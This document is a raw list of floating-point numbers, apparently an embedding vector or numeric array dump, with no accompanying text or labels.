-0.030530814081430435, -0.01979781687259674, 0.02396826259791851, 0.0004118807555641979, 0.00006138252501841635, -0.012629370205104351, -0.02214271016418934, 0.02902001142501831, 0.005012404173612595, -0.0161624476313591, -0.0022740736603736877, -0.020112568512558937, -0.0005808133282698691, -0.019671916961669922, -0.022567622363567352, 0.016241135075688362, -0.03547240048646927, 0.03783303126692772, -0.003389471210539341, -0.0100956279784441, 0.0031947193201631308, 0.010072021745145321, 0.007483196910470724, 0.030719665810465813, -0.0046307691372931, 0.016130970790982246, -0.023716462776064873, 0.02579381689429283, 0.01797226257622242, -0.0002290548727614805, 0.011165780015289783, -0.015438520349562168, 0.047558825463056564, 0.030656715855002403, -0.019073890522122383, -0.039092034101486206, -0.034905847162008286, 0.013597228564321995, -0.020867969840765, -0.035787150263786316, 0.03575567528605461, 0.007345493882894516, 0.0004893389414064586, -0.04485196992754936, 0.02127714455127716, -0.007746800780296326, -0.013550016097724438, 0.00039393012411892414, -0.026407580822706223, -0.026958394795656204, -0.008537611924111843, 0.03123900294303894, -0.06578288972377777, 0.0011439219815656543, 0.018397176638245583, -0.001030808431096375, 0.005716659128665924, -0.008293679915368557, -0.024330226704478264, -0.0076956539414823055, -0.0060196067206561565, -0.009788746014237404, 0.005283876787871122, -0.01595785841345787, -0.002909476403146982, -0.010630703531205654, -0.005114698316901922, 0.01596572808921337, 0.0048747011460363865, -0.013077890500426292, -0.004788144491612911, -0.015068688429892063, 0.005114698316901922, -0.04425394535064697, -0.0074123782105743885, -0.024062689393758774, 0.006047147326171398, -0.009953989647328854, 0.016603097319602966, -0.015572289004921913, -0.015650976449251175, -0.0006752385525032878, 0.05945640057325363, -0.0403825119137764, -0.02524300292134285, 0.014864100143313408, 0.03481142222881317, -0.022315822541713715, -0.024943990632891655, 0.003023573663085699, -0.012102163396775723, 0.006849761586636305, 0.00864777434617281, 0.0030648845713585615, -0.03663697838783264, -0.008089092560112476, 0.06955989450216293, -0.004674047231674194, 0.00600780313834548, -0.009568420238792896, -0.012062819674611092, 0.026344630867242813, -0.011000535450875759, 0.013518541119992733, 0.012967727147042751, -0.011866100132465363, -0.011653643101453781, -0.017405711114406586, 0.00042811009916476905, 0.044600170105695724, 0.0009516289574094117, 0.011708725243806839, -0.008104830048978329, -0.014415580779314041, 0.0018353898776695132, -0.028421984985470772, -0.013487066142261028, 0.0017183419549837708, -0.02429875172674656, 0.00834876112639904, 0.03317471966147423, -0.011826756410300732, -0.006656976416707039, -0.006865499075502157, -0.035189125686883926, 0.008167780004441738, 0.0033186522778123617, 0.03896613419055939, -0.006893039681017399, -0.002567185088992119, 0.0024963661562651396, 0.008663511835038662, -0.007856963202357292, 0.01047332864254713, -0.0178463626652956, -0.016713259741663933, 0.01252707652747631, 0.006495666690170765, 0.002693085465580225, -0.01133889239281416, 0.02020699344575405, 0.01426607370376587, -0.018932253122329712, -0.005307483021169901, -0.03849400579929352, 0.008277942426502705, -0.0015167047968134284, -0.021796483546495438, 0.019703391939401627, 0.003015704918652773, 0.005984196905046701, 0.02875247411429882, 0.0033835696522146463, 0.026690857484936714, 0.008750068955123425, 0.014447055757045746, -0.0015511306701228023, 0.00589370634406805, -0.008089092560112476, -0.000004656711553252535, -0.009851695969700813, 0.005811084061861038, -0.005456989631056786, 0.008364498615264893, -0.006771073676645756, 0.018947990611195564, 0.009843827225267887, -0.015698188915848732, -0.019435852766036987, 0.0085848243907094, -0.03471699729561806, -0.0006103212363086641, -0.008592693135142326, 0.00749106565490365, -0.015721796080470085, -0.00030417702510021627, 0.0158240906894207, 0.050800759345293045, -0.0228981114923954, 0.007317952811717987, -0.004784210119396448, 0.019907979294657707, 0.002773740328848362, -0.024220064282417297, -0.01426607370376587, 0.01811389997601509, -0.010245134122669697, 0.010961191728711128, 0.005630102474242449, -0.010315952822566032, 0.016540147364139557, -0.03710910305380821, -0.013534278608858585, 0.03496880084276199, -0.023338761180639267, 0.006102228537201881, -0.02484956569969654, -0.004583556670695543, 0.003957989625632763, -0.013715260662138462, 0.022567622363567352, -0.02263057231903076, -0.025022678077220917, 0.013408378697931767, -0.006794679909944534, -0.005846493411809206, -0.04570179805159569, -0.02780822105705738, -0.022662047296762466, -0.031947191804647446, -0.002594725927338004, 0.04472607001662254, -0.00834876112639904, 0.008844493888318539, -0.020348630845546722, -0.024220064282417297, 0.012999202124774456, -0.0053625646978616714, -0.017657512798905373, -0.011236598715186119, -0.03799040615558624, 0.019215527921915054, 0.006121900398284197, -0.002758002607151866, 0.010969060473144054, 0.02491251565515995, -0.03446519747376442, 0.0034012743271887302, 0.005433383397758007, -0.005622233729809523, -0.004835356958210468, 0.021985333412885666, -0.01783062517642975, -0.02263057231903076, -0.0021481732837855816, -0.015902778133749962, -0.003822253318503499, -0.0336468480527401, 0.002197353169322014, -0.0004436017188709229, 0.0343392975628376, -0.009883170947432518, 0.029775412753224373, 0.015407045371830463, 0.00398749765008688, 0.0013691653730347753, -0.0022465328220278025, 0.03619632497429848, 0.012676582671701908, -0.013849029317498207, -0.019231265410780907, -0.005224861204624176, 0.010284477844834328, -0.003143572248518467, 0.00021208784892223775, -0.011755937710404396, -0.03292291983962059, -0.011881837621331215, 0.020694855600595474, 0.015289013274013996, -0.0239053126424551, -0.01750013791024685, -0.036322228610515594, 0.02181222103536129, 0.006771073676645756, 0.0029625906608998775, 0.006853695958852768, 0.02840624749660492, 0.0062241945415735245, -0.02524300292134285, 0.009363831952214241, -0.01583195850253105, -0.0012875269167125225, -0.0024353833869099617, -0.005000601056963205, -0.004418312571942806, 0.006460257340222597, 0.0004470442945603281, 0.05501841753721237, -0.024959728121757507, 0.025746604427695274, 0.014494268223643303, -0.020285680890083313, -0.023401712998747826, 0.02739904634654522, -0.004327821545302868, 0.0016317855333909392, 0.017673250287771225, 0.028988536447286606, -0.004347493406385183, -0.03330061957240105, -0.0045166718773543835, -0.015635238960385323, 0.03374127298593521, -0.019876504316926003, -0.020553218200802803, -0.012267407029867172, 0.0009860547725111246, 0.023401712998747826, -0.04192478954792023, 0.028862636536359787, 0.023873837664723396, 0.016241135075688362, 0.0471181757748127, -0.05158763378858566, 0.035724200308322906, 0.03931235894560814, 0.023008273914456367, -0.005700921639800072, -0.02902001142501831, 0.040288086980581284, 0.005460924003273249, 0.047023750841617584, -0.00589370634406805, -0.019876504316926003, 0.026171518489718437, -0.038273680955171585, 0.00214620609767735, -0.02772953361272812, 0.04604802280664444, 0.012936252169311047, 0.004615031648427248, -0.010229396633803844, 0.05549054220318794, -0.0005331089487299323, 0.00011501924018375576, 0.005264204926788807, -0.024802353233098984, -0.019168315455317497, -0.008655643090605736, -0.005421580281108618, -0.007935651578009129, -0.012235932052135468, -0.02074206806719303, 0.02618725597858429, -0.00875793769955635, 0.027556421235203743, 0.01622539758682251, -0.032356370240449905, 0.001998666673898697, -0.004882569890469313, -0.007011071313172579, -0.03427634760737419, 0.0034602901432663202, 0.02618725597858429, 0.013140840455889702, 0.005964525043964386, -0.02914591133594513, 0.028421984985470772, 0.007884504273533821, -0.00664517330005765, -0.05608857050538063, 0.01070152223110199, -0.01838143914937973, 0.01899520307779312, -0.0107723418623209, 0.0296337753534317, -0.014030011370778084, 0.008191386237740517, 0.007451721932739019, -0.02269352227449417, -0.03644812852144241, -0.025132840499281883, -0.02248893491923809, 0.033898647874593735, -0.027147244662046432, -0.019341427832841873, -0.03956415876746178, 0.030939990654587746, -0.03171113133430481, 0.0037356968969106674, -0.017138173803687096, 0.015839828178286552, -0.005842559039592743, -0.004166511818766594, -0.004776341374963522, -0.024928253144025803, -0.006955989636480808, 0.0016848996747285128, 0.04362444207072258, 0.007601228542625904, -0.01904241554439068, -0.03393012285232544, -0.008970393799245358, -0.019152577966451645, -0.016713259741663933, -0.014329023659229279, -0.0653422400355339, 0.02456628903746605, 0.021702058613300323, 0.01131528615951538, -0.0054097771644592285, 0.013597228564321995, 0.012007737532258034, 0.01978207938373089, 0.0265806932002306, -0.0015688353450968862, 0.005563218146562576, -0.011976262554526329, 0.004831422585994005, 0.018617501482367516, 0.0065507483668625355, 0.014667381532490253, 0.061156053096055984, -0.004402575083076954, 0.010402509942650795, -0.016107365489006042, -0.010426116175949574, -0.028988536447286606, 0.0065074702724814415, 0.004607162903994322, -0.028170185163617134, 0.038273680955171585, 0.025337427854537964, -0.0037435656413435936, 0.0034937323071062565, 0.017216861248016357, -0.03547240048646927, -0.003851761342957616, -0.04563884809613228, 0.000856711994856596, -0.0049651917070150375, -0.019546017050743103, -0.04746440052986145, -0.008498268201947212, -0.024692188948392868, 0.017216861248016357, -0.03257669508457184, 0.011150042526423931, 0.025164315477013588, -0.023921050131320953, -0.02382662519812584, 0.01181101892143488, 0.029004273936152458, 0.024802353233098984, -0.006916645914316177, -0.0009098261361941695, -0.019341427832841873, -0.03421339765191078, 0.010803816840052605, -0.01053627859801054, -0.017216861248016357, 0.00589370634406805, 0.04387624189257622, -0.015068688429892063, 0.015312619507312775, 0.00025130872381851077, -0.011039880104362965, -0.002582922577857971, 0.039092034101486206, -0.03540945053100586, 0.03474847227334976, -0.022111235186457634, -0.020789282396435738, 0.010748735629022121, 0.0010524475947022438, -0.01481688767671585, -0.035189125686883926, -0.011024141684174538, 0.0161624476313591, 0.01979781687259674, -0.006830089259892702, 0.012479864060878754, -0.04025661200284958, -0.024928253144025803, -0.03049933910369873, -0.0035271747037768364, -0.00047581447870470583, 0.01776767522096634, -0.004508803132921457, 0.01635129749774933, 0.012951989658176899, -0.011425449512898922, 0.031600967049598694, 0.017799150198698044, -0.005964525043964386, 0.03802188113331795, -0.020222730934619904, -0.011008404195308685, 0.00434355903416872, 0.01838143914937973, -0.0040288083255290985, -0.04532409459352493, -0.010646441020071507, 0.002213090658187866, 0.023480400443077087, 0.01097692921757698, 0.01830275170505047, -0.002494398970156908, -0.003588157705962658, 0.0010839225724339485, 0.05177648365497589, -0.039627108722925186, -0.00011563398584257811, -0.01778341270983219, -0.02281942404806614, 0.03644812852144241, -0.021702058613300323, 0.007066152524203062, 0.013298215344548225, 0.01047332864254713, 0.00848253071308136, 0.02283516153693199, -0.002112763933837414, -0.021119769662618637, -0.00498092919588089, -0.008931050077080727, -0.005696987267583609, -0.000708680774550885, 0.005803215317428112, -0.016107365489006042, -0.0014488366432487965, 0.020285680890083313, 0.014667381532490253, -0.006609763950109482, 0.011630036868155003, -0.017138173803687096, -0.00026360369520261884, -0.011905443854629993, -0.020018141716718674, -0.009481864050030708, -0.036385178565979004, -0.023480400443077087, 0.015918515622615814, 0.04768472537398338, 0.015485732816159725, -0.013534278608858585, 0.022064020857214928, -0.0070858243852853775, -0.0011331024579703808, -0.005598627496510744, -0.0023684988263994455, -0.009190719574689865, -0.0211984571069479, -0.0016465394292026758, -0.006660910788923502, 0.056781020015478134, -0.021355831995606422, 0.029806887730956078, -0.03333209455013275, 0.005114698316901922, -0.012912645936012268, 0.0023684988263994455, 0.030578026548027992, -0.0030943925958126783, -0.017799150198698044, -0.012306750752031803, 0.008443186990916729, -0.014407712034881115, -0.004611097276210785, 0.01386476680636406, 0.020679118111729622, 0.010016939602792263, 0.015005738474428654, -0.019026678055524826, -0.016728997230529785, -0.0035134044010192156, 0.008514005690813065, 0.010355296544730663, -0.0279341209679842, 0.015635238960385323, 0.014722462743520737, 0.007546147331595421, -0.023732200264930725, -0.0008985148160718381, -0.01460443064570427, 0.02403121255338192, 0.0171696487814188, -0.012967727147042751, -0.017012273892760277, -0.022740736603736877, -0.012235932052135468, 0.007317952811717987, -0.02241024747490883, -0.028170185163617134, -0.009812352247536182, -0.0058228871785104275, 0.0008719576871953905, 0.0201912559568882, -0.019372902810573578, -0.0158240906894207, 0.08240172266960144, -0.0010701522696763277, -0.018885040655732155, 0.0039048753678798676, -0.016146710142493248, 0.009489732794463634, 0.013251002877950668, -0.019845029339194298, -0.010229396633803844, -0.02396826259791851, -0.0006393372896127403, 0.027965595945715904, -0.00878154393285513, 0.0023822691291570663, 0.00966284517198801, 0.00733762513846159, 0.004217659123241901, -0.023134173825383186, 0.003537010634317994, -0.009001868776977062, 0.003393405582755804, 0.0061809164471924305, 0.006416979245841503, -0.002091124653816223, 0.021434521302580833, -0.0008375318720936775, -0.004902241751551628, -0.003959957044571638, -0.02045879326760769, -0.007093693129718304, -0.02902001142501831, 0.008230729959905148, -0.02072633057832718, -0.005193386226892471, -0.0057796090841293335, -0.00041433973819948733, 0.021528946235775948, 0.0171696487814188, -0.021843696013092995, -0.021796483546495438, -0.012676582671701908, -0.011669380590319633, -0.006436651106923819, -0.013384772464632988, -0.009631370194256306, 0.021560421213507652, 0.009450389072299004, 0.027619371190667152, -0.023543350398540497, -0.009426782839000225, -0.005134370177984238, -0.010717260651290417, -0.00031622606911696494, -0.00888383761048317, -0.007849094457924366, -0.010158577933907509, 0.009072688408195972, -0.025620704516768456, -0.0055278087966144085, 0.010323821566998959, 0.01195265632122755, 0.011433318257331848, -0.000814417377114296, 0.0006535994471050799, 0.0092615382745862, -0.018633238971233368, -0.008931050077080727, -0.012668713927268982, -0.008045814000070095, -0.0117874126881361, -0.0035527481231838465, 0.00018208817346021533, 0.009875302202999592, 0.004937651101499796, -0.003202588064596057, -0.025211527943611145, -0.04006775841116905, -0.0168391615152359, 0.00670025497674942, -0.008096961304545403, 0.026502005755901337, 0.004127168096601963, 0.007357296999543905, -0.0021304686088114977, -0.035440925508737564, -0.013660178519785404, -0.0008724494837224483, -0.006039278581738472, 0.010111365467309952, -0.020364368334412575, -0.005468792747706175, 0.011456924490630627, 0.02606135606765747, -0.006511404644697905, 0.011126436293125153, -0.014289679937064648, 0.0265806932002306, -0.0056891185231506824, -0.009922514669597149, -0.02477087825536728, 0.003782909596338868, 0.006955989636480808, 0.012778877280652523, -0.02787117101252079, -0.03062523901462555, 0.024865303188562393, 0.009529076516628265, -0.009875302202999592, -0.00749106565490365, -0.004111430607736111, 0.013117234222590923, -0.0013229363830760121, 0.01609162800014019, -0.017720462754368782, 0.002234729705378413, -0.006692386232316494, 0.004064218141138554, 0.010048414580523968, 0.0010553983738645911, 0.0025258741807192564, -0.01912110298871994, -0.0020144041627645493, 0.01729554869234562, -0.0444427952170372, -0.008380236104130745, 0.022536147385835648, 0.002362597268074751, -0.012503470294177532, -0.022787949070334435, 0.042050689458847046, -0.005224861204624176, -0.010504803620278835, 0.02004961669445038, 0.012102163396775723, 0.009702188894152641, -0.021843696013092995, 0.0040602837689220905, 0.0107723418623209, 0.00875793769955635, 0.02935050055384636, -0.02470792643725872, 0.010205790400505066, -0.01817685179412365, 0.02484956569969654, 0.01918405294418335, -0.0013632638147100806, -0.025368904694914818, -0.004615031648427248, -0.011842493899166584, -0.010481197386980057, 0.014313286170363426, -0.04928995296359062, 0.01973486691713333, -0.015383439138531685, 0.01803521253168583, -0.02772953361272812, 0.005516005214303732, -0.050580430775880814, 0.009489732794463634, 0.008270073682069778, -0.013479197397828102, 0.013856898061931133, 0.0052445330657064915, -0.04541851952672005, 0.0010868733515962958, 0.0007740899454802275, -0.007986797951161861, 0.0015855565434321761, 0.011464793235063553, -0.001454738201573491, 0.008380236104130745, -0.016052283346652985, -0.043718867003917694, -0.0025907913222908974, 0.015328357927501202, 0.001438017119653523, 0.005960590671747923, 0.009308750741183758, 0.017799150198698044, -0.0255734920501709, -0.002439317759126425, 0.013825423084199429, 0.008828756399452686, 0.00017016207857523113, 0.014801150187849998, 0.0030294752214103937, -0.009654976427555084, 0.005791412200778723, -0.022441722452640533, -0.008860231377184391, 0.012668713927268982, 0.02263057231903076, -0.00945825781673193, -0.035503875464200974, 0.023527612909674644, -0.01511590089648962, -0.002982262521982193, -0.0019278478575870395, 0.005299614276736975, -0.03742385283112526, -0.002112763933837414, 0.000767696532420814, 0.012700189836323261, 0.0013426083605736494, 0.01507655717432499, -0.015430651605129242, -0.043592967092990875, -0.004508803132921457, -0.008333023637533188, 0.00002225385651399847, -0.00663337018340826, -0.006090425420552492, -0.014187386259436607, 0.022850899025797844, 0.013140840455889702, 0.00231538456864655, -0.0048747011460363865, -0.04013070836663246, -0.0034583229571580887, 0.01690211147069931, -0.002679315162822604, -0.00852187443524599, -0.004532409831881523, -0.011732331477105618, -0.006275341380387545, -0.007317952811717987, 0.021576158702373505, -0.01770472526550293, 0.00996185839176178, 0.00006202801159815863, 0.009780877269804478, -0.03260817006230354, 0.022174185141921043, 0.010221527889370918, -0.012204457074403763, 0.02604561857879162, -0.0008124501327984035, -0.01622539758682251, 0.014690987765789032, -0.005394039675593376, 0.009466126561164856, 0.02209549769759178, -0.012102163396775723, 0.011134305037558079, 0.008694986812770367, -0.00030098031857050955, 0.009379569441080093, 0.037864506244659424, -0.016728997230529785, 0.005240598693490028, 0.006987464614212513, 0.011488399468362331, 0.016713259741663933, -0.005921246949583292, -0.0013091660803183913, 0.008742200210690498, 0.002451120875775814, -0.009513339027762413, 0.0014862132957205176, -0.026879707351326942, 0.027698058634996414, -0.016744734719395638, 0.0017006371635943651, 0.012771008536219597, -0.009355963207781315, -0.02263057231903076, -0.009056949988007545, -0.009411045350134373, 0.006318619474768639, 0.010662178508937359, -0.020836494863033295, -0.006798614282160997, -0.03846253082156181, -0.02308696135878563, -0.01336116623133421, 0.01030021533370018, 0.018161114305257797, -0.0012422815198078752, -0.0033029147889465094, 0.017216861248016357, 0.003371766535565257, -0.0006078622536733747, 0.011205123737454414, -0.021906645968556404, -0.017279811203479767, 0.024157114326953888, -0.020962394773960114, -0.005071420222520828, -0.016854899004101753, 0.0014685086207464337, 0.0037691392935812473, -0.013730998151004314, -0.031947191804647446, -0.018003737553954124, -0.028500672429800034, 0.015934253111481667, -0.011590693145990372, 0.018664713948965073, 0.028642309829592705, -0.019435852766036987, 0.000262866000412032, 0.009930383414030075, 0.011181517504155636, -0.033898647874593735, 0.0025003005284816027, -0.023244336247444153, -0.01757882535457611, -0.02195385843515396, 0.020852232351899147, 0.0027619372121989727, -0.02201680839061737, -0.004685850348323584, -0.024881040677428246, -0.02484956569969654, 0.004906176123768091, -0.016107365489006042, -0.026344630867242813, 0.027084294706583023, 0.012778877280652523, -0.0020596496760845184, 0.031475067138671875, -0.010229396633803844, 0.02094665728509426, 0.005535677541047335, -0.003507502842694521, -0.01561950147151947, -0.016681784763932228, -0.0005031092441640794, -0.016791947185993195, -0.00043548704707063735, 0.033961597830057144, -0.005862231366336346, 0.01696506142616272, -0.016036545857787132, 0.004599294159561396, -0.0041035618633031845, 0.005315351765602827, 0.0013809686060994864, -0.010315952822566032, 0.022929586470127106, -0.017012273892760277, 0.02242598496377468, -0.016854899004101753, 0.013282477855682373, -0.005181582644581795, 0.0024884974118322134, 0.0149821313098073, 0.003407175885513425, -0.011984131298959255, -0.027037082239985466, -0.012283144518733025, 0.0027796418871730566, -0.023338761180639267, -0.024015475064516068, 0.028799686580896378, 0.025730866938829422, -0.016477197408676147, -0.00492978235706687, -0.0010209725005552173, 0.0027127573266625404, -0.0021894844248890877, -0.0071291024796664715, -0.018664713948965073, 0.0017822756199166179, 0.0010672014905139804, -0.010079890489578247, 0.00755795044824481, 0.00868711806833744, -0.0002845051058102399, -0.008773675188422203, -0.0015285079134628177, 0.005185517016798258, 0.04393919184803963, -0.028642309829592705, 0.028988536447286606, 0.027839696034789085, 0.04362444207072258, -0.008569086901843548, -0.004733063280582428, 0.027084294706583023, -0.017421448603272438, -0.02739904634654522, 0.0031140644568949938, 0.005936984438449144, 0.003210456809028983, 0.004583556670695543, -0.0007175331702455878, -0.0004721260047517717, 0.013172315433621407, -0.01750013791024685, 0.02538464218378067, -0.004359296523034573, 0.00337570090778172, 0.014832625165581703, -0.015422782860696316, -0.0021442389115691185, -0.019703391939401627, 0.000025957708203350194, -0.02678528241813183, -0.011039880104362965, -0.01879061572253704, -0.006613698322325945, -0.005630102474242449, 0.012054950930178165, 0.02174927107989788, -0.01635129749774933, -0.02025420591235161, -0.02807576023042202, 0.0037848767824470997, -0.023008273914456367, 0.027100032195448875, -0.01879061572253704, -0.029980000108480453, -0.013014940544962883, -0.00875793769955635, -0.007498934864997864, 0.017626037821173668, 0.013935585506260395, 0.010795948095619678, 0.000008890784556569997, -0.007731063291430473, -0.024157114326953888, 0.018963728100061417, -0.02429875172674656, -0.00026827576220966876, 0.0026753805577754974, 0.010127102956175804, -0.009056949988007545, -0.023197123780846596, 0.008970393799245358, -0.018334226682782173, 0.00035901248338632286, 0.007062218151986599, 0.005999934393912554, -0.024125639349222183, -0.009033343754708767, -0.011189386248588562, -0.006696320604532957, -0.008726461790502071, 0.013675916939973831, 0.0009944153716787696, -0.019341427832841873, 0.012794614769518375, 0.0043829032219946384, 0.010205790400505066, 0.007514672353863716, -0.01373886689543724, -0.017138173803687096, 0.009804483503103256, -0.020175518468022346, 0.038399580866098404, -0.00932448823004961, -0.007243199739605188, 0.014848362654447556, 0.014289679937064648, -0.0054963333532214165, 0.02968098782002926, -0.005708790384232998, -0.0049179792404174805, -0.00902547501027584, 0.01369952317327261, -0.026281680911779404, -0.0041468399576842785, 0.00018774384807329625, 0.012534945271909237, 0.022174185141921043, 0.0038793019484728575, 0.0016239166725426912, -0.00417438056319952, -0.011386105790734291, 0.01905815303325653, -0.011842493899166584, -0.00323209585621953, -0.01276313979178667, -0.012338225729763508, 0.005276008043438196, -0.02604561857879162, -0.004941585473716259, 0.02207976020872593, 0.020584693178534508, 0.02787117101252079, 0.0410749614238739, 0.005012404173612595, -0.009300881996750832, 0.0007401558686979115, 0.025683654472231865, -0.0023999738041311502, 0.005342892371118069, 0.006889105308800936, 0.006664845161139965, 0.001679981709457934, -0.024991203099489212, 0.008994000032544136, 0.009300881996750832, 0.01562737114727497, 0.0036334029864519835, -0.00314750662073493, 0.022599097341299057, -0.0059015750885009766, 0.0009727762662805617, -0.015532945282757282, -0.019215527921915054, -0.005630102474242449, 0.00878154393285513, -0.0052917455323040485, -0.014218861237168312, 0.0003240948135498911, 0.005417645908892155, -0.001366214593872428, -0.008931050077080727, 0.033961597830057144, -0.008325154893100262, -0.014698856510221958, -0.019341427832841873, -0.015336226671934128, -0.0019150611478835344, -0.009804483503103256, -0.029271811246871948, -0.01204708218574524, -0.006283210124820471, 0.002942918799817562, -0.007258937228471041, 0.003346193116158247, -0.009300881996750832, -0.01380181685090065, -0.003049147082492709, 0.007758603896945715, -0.018900778144598007, -0.0010849061654880643, 0.004567819181829691, 0.013707391917705536, 0.00939530786126852, -0.002883902983739972, 0.005909443832933903, 0.015469995327293873, -0.0011822822270914912, 0.019278477877378464, 0.007070086896419525, 0.004611097276210785, 0.009599895216524601, -0.006055016070604324, -0.020348630845546722, 0.012959858402609825, 0.0005817969213239849, 0.01248773280531168, 0.0018904712051153183, 0.005016338545829058, -0.030200326815247536, 0.006755336187779903, 0.03257669508457184, -0.0021225998643785715, -0.00915924459695816, -0.006853695958852768, -0.004768472630530596, 0.0012580191250890493, -0.006157309748232365, -0.011456924490630627, 0.009953989647328854, 0.0028071824926882982, -0.003676681313663721, -0.01467525027692318, 0.00434355903416872, -0.0017567022005096078, -0.014163780026137829, -0.01292838342487812, -0.001612113555893302, -0.0027088229544460773, -0.00688123656436801, -0.015525076538324356, -0.004851094447076321, 0.006991398986428976, 0.009867433458566666, -0.018885040655732155, 0.002769805956631899, -0.0024117769207805395, -0.017421448603272438, 0.008034010417759418, 0.014746068976819515, 0.021229932084679604, 0.004422246944159269, 0.013038546778261662, -0.00996185839176178, -0.0020989933982491493, -0.011386105790734291, -0.03218325600028038, 0.02162337116897106, -0.011992000043392181, 0.013715260662138462, 0.01743718609213829, 0.0031101300846785307, 0.005079288966953754, 0.0029920984525233507, -0.01569032110273838, 0.003224227111786604, -0.023921050131320953, 0.014250336214900017, -0.003855695715174079, -0.011472661979496479, 0.006991398986428976, -0.001573753310367465, 0.020899444818496704, 0.028909849002957344, 0.008230729959905148, 0.003533076262101531, 0.0012590027181431651, 0.014502136968076229, 0.006082556676119566, -0.023873837664723396, -0.01276313979178667, 0.0011272007832303643, 0.01945159211754799, 0.0037888111546635628, -0.009473995305597782, -0.005641905590891838, 0.006668779533356428, 0.014297548681497574, 0.006987464614212513, 0.0000902449173736386, -0.02094665728509426, 0.0014488366432487965, 0.012558551505208015, -0.02505415305495262, 0.028044285252690315, 0.012605763971805573, -0.01635129749774933, -0.007105496246367693, 0.007986797951161861, -0.005874034482985735, 0.01467525027692318, 0.003397339954972267, 0.008120567537844181, -0.012873302213847637, -0.0011016273638233542, -0.003540945006534457, 0.011622168123722076, 0.03496880084276199, 0.02503841556608677, -0.004988797940313816, -0.04488344490528107, 0.006350094918161631, -0.006952055264264345, 0.01023726537823677, -0.00772712891921401, -0.002065551234409213, -0.014824756421148777, -0.005354695953428745, 0.010166446678340435, -0.0053350236266851425, 0.009253669530153275, 0.03736090287566185, 0.0010612999321892858, 0.011354629881680012, -0.029114436358213425, -0.00932448823004961, 0.007510737981647253, -0.014108698815107346, -0.008813018910586834, 0.018271276727318764, 0.010331690311431885, -0.010945454239845276, -0.017059486359357834, -0.001956372056156397, 0.0008124501327984035, 0.0036707797553390265, 0.00023040732776280493, -0.0003543403872754425, -0.03311176970601082, 0.010913979262113571, -0.011401843279600143, 0.0021363701671361923, 0.0011704789940267801, 0.01133889239281416, -0.011858231388032436, -0.002278008032590151, -0.012810352258384228, -0.011897575110197067, 0.00902547501027584, -0.004969126079231501, -0.01595785841345787, -0.002999967196956277, 0.0005867148865945637, 0.0146437743678689, -0.025903979316353798, 0.004500934388488531, 0.001454738201573491, -0.02308696135878563, -0.004552081692963839, 0.002527841366827488, -0.008490399457514286, -0.028768211603164673, 0.0063422261737287045, 0.014596561901271343, 0.021229932084679604, -0.0001340149319730699, 0.013030678033828735, -0.0350317507982254, -0.008860231377184391, 0.0061809164471924305, -0.023448925465345383, 0.002759970026090741, 0.01897946558892727, 0.006334356963634491, -0.012393307872116566, 0.012338225729763508, -0.022913848981261253, -0.018664713948965073, 0.011905443854629993, -0.0037179922219365835, 0.0201912559568882, 0.000029692298994632438, -0.007589425425976515, -0.010441853664815426, 0.031600967049598694, 0.004607162903994322, 0.013258871622383595, -0.00791204534471035, 0.003767172107473016, 0.017484400421380997, 0.03279701992869377, 0.005791412200778723, -0.005830755922943354, 0.007853029295802116, -0.02464497648179531, -0.014596561901271343, 0.005390105303376913, -0.0067592705599963665, 0.014974262565374374, -0.004024873953312635, -0.007884504273533821, 0.0033776680938899517, 0.018161114305257797, -0.006090425420552492, -0.00038999575190246105, 0.012298882007598877, -0.000025004850613186136, -0.013927716761827469, -0.009182850830256939, -0.012715927325189114, -0.007475328166037798, -0.014533611945807934, 0.0032753741834312677, -0.002362597268074751, -0.013557884842157364, 0.00308849080465734, 0.00309635978192091, -0.0013622802216559649, 0.007156643085181713, 0.009277275763452053, 0.029303286224603653, 0.004984863568097353, -0.0146437743678689, 0.006979595869779587, 0.003322586650028825, -0.0054963333532214165, 0.017264073714613914, 0.017610300332307816, 0.011669380590319633, -0.004886504262685776, -0.0007003202335909009, 0.013927716761827469, 0.004571753554046154, -0.00004373927731649019, 0.019970929250121117, -0.013620834797620773, 0.015548682771623135, 0.009513339027762413, 0.01133889239281416, -0.010583491064608097, -0.022709259763360023, -0.00875793769955635, 0.0015147376107051969, 0.01642998494207859, 0.0024235800374299288, 0.027776746079325676, 0.0178463626652956, 0.025431854650378227, -0.0013042481150478125, -0.015202457085251808, -0.001866864855401218, 0.0069245146587491035, -0.012306750752031803, -0.01097692921757698, -0.013691654428839684, 0.011189386248588562, 0.04677194729447365, 0.010127102956175804, -0.00010026530071627349, -0.006578288972377777, 0.036857303231954575, -0.028579359874129295, -0.010764473117887974, -0.008514005690813065, 0.012708058580756187, -0.003588157705962658, -0.0279341209679842, -0.021560421213507652, 0.01306215301156044, 0.013211659155786037, 0.0011645774357020855, 0.001607195590622723, -0.0036963531747460365, -0.01023726537823677, 0.00289373891428113, -0.00801433902233839, 0.00794745422899723, 0.000716549577191472, 0.0011970361229032278, 0.00309635978192091, -0.0069677927531301975, 0.008718593046069145, 0.006330422591418028, 0.005626168102025986, -0.0146437743678689, -0.006908777169883251, 0.0035055356565862894, -0.005405842792242765, -0.009190719574689865, -0.0089231813326478, 0.019404377788305283, -0.0033560290466994047, -0.01594999060034752, -0.014423449523746967, 0.032136041671037674, 0.02349613793194294, -0.010410378687083721, -0.008852362632751465, -0.010205790400505066, -0.01420312374830246, -0.0008685151115059853, -0.01657162234187126, -0.006806483026593924, -0.0073651657439768314, -0.020647643133997917, -0.019372902810573578, -0.03556682541966438, -0.016666047275066376, -0.010622834786772728, -0.015737533569335938, 0.015729663893580437, 0.012676582671701908, 0.01447853073477745, -0.001166544621810317, 0.006688451860100031, -0.00289373891428113, -0.003055048640817404, 0.007471393793821335, -0.0006899925065226853, -0.011559218168258667, -0.014895575121045113, -0.012684452347457409, 0.006137637887150049, -0.007927782833576202, -0.011763806454837322, -0.012416914105415344, 0.010111365467309952, 0.013573622331023216, -0.01312510296702385, -0.004988797940313816, -0.01174806896597147, 0.004481262527406216, 0.020018141716718674, 0.004245199728757143, 0.018224064260721207, 0.01630408503115177, -0.015973595902323723, 0.008813018910586834, -0.0065074702724814415, -0.005913378205150366, -0.02894132398068905, -0.021245669573545456, 0.004677981603890657, 0.003873400390148163, -0.0006781893316656351, 0.013534278608858585, 0.009371700696647167, 0.001738997409120202, -0.005476661492139101, -0.00864777434617281, -0.023858100175857544, -0.009466126561164856, 0.01528114452958107, 0.00451273750513792, -0.013140840455889702, 0.004563884809613228, 0.0037809424102306366, 0.007420246955007315, -0.0007534344331361353, -0.004276674706488848, 0.007605162914842367, 0.004831422585994005, -0.008207123726606369, 0.008805150166153908, -0.01558015774935484, 0.015328357927501202, 0.015643108636140823, 0.003767172107473016, 